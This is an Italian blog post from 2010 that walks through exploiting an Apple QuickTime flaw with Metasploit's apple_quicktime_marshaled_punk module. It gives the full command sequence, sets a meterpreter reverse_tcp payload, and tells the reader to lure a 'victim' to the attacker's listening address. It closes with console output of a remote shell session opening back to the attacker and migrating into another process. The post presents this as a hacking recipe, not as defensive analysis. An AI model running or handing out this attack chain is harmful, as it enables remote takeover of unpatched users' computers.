Apple QuickTime
Il 12 agosto 2010 è stata fixata con la versione 7.6.7 di QuickTime una falla critica che permetteva l’esecuzione di codice remoto sul pc vittima.
[METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow
Ora il 31 agosto 2010, QuickTime soffre ancora e mette a repentaglio la sicurezza degli utenti.
Vediamo come sfruttare questo exploit con metasploit o.O
Aggiorniamo metasploit:
sudo svn update
Prendiamo l’exploit:
use windows/browser/apple_quicktime_marshaled_punk
Nostro ip, dove andrà in ascolto il server sulla 8080 (porta cambiabile show options)
set URIPATH /
Usiamo meterpreter:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP
exploit
Adesso facciamo visitare alla vittima:
IP:8080
msf exploit(apple_quicktime_marshaled_punk) >
[*] Sending Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution exploit HTML to 192.168.1.153:1108...
Ed la bella shell aperta :D
msf exploit(apple_quicktime_marshaled_punk) > sessions -l
[*] Sending stage (748544 bytes) to 192.168.1.153
[*] Meterpreter session 1 opened (192.168.1.21:4444 -> 192.168.1.153:1109) at Tue Aug 31 11:22:39 +0200 2010
[*] Session ID 1 (192.168.1.21:4444 -> 192.168.1.153:1109) processing AutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (2292)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2696
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter CLSHACKX-APAZR1\clshack @ CLSHACKX-APAZR1 192.168.1.21:4444 -> 192.168.1.153:1109
Good Luck :D
Related posts:
- [METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow
- [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
- [Metasploit] multi/handler :D
- IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
- [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
This entry was posted on Tuesday, August 31st, 2010 at 9:25 am and is filed under Hacking. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
Tagged with: Apple • attack • bug • exploit • lan • metasploit • quiktime







Pingback: Apple QuickTime
Pingback: news sul mondo della programmazione » Apple QuickTime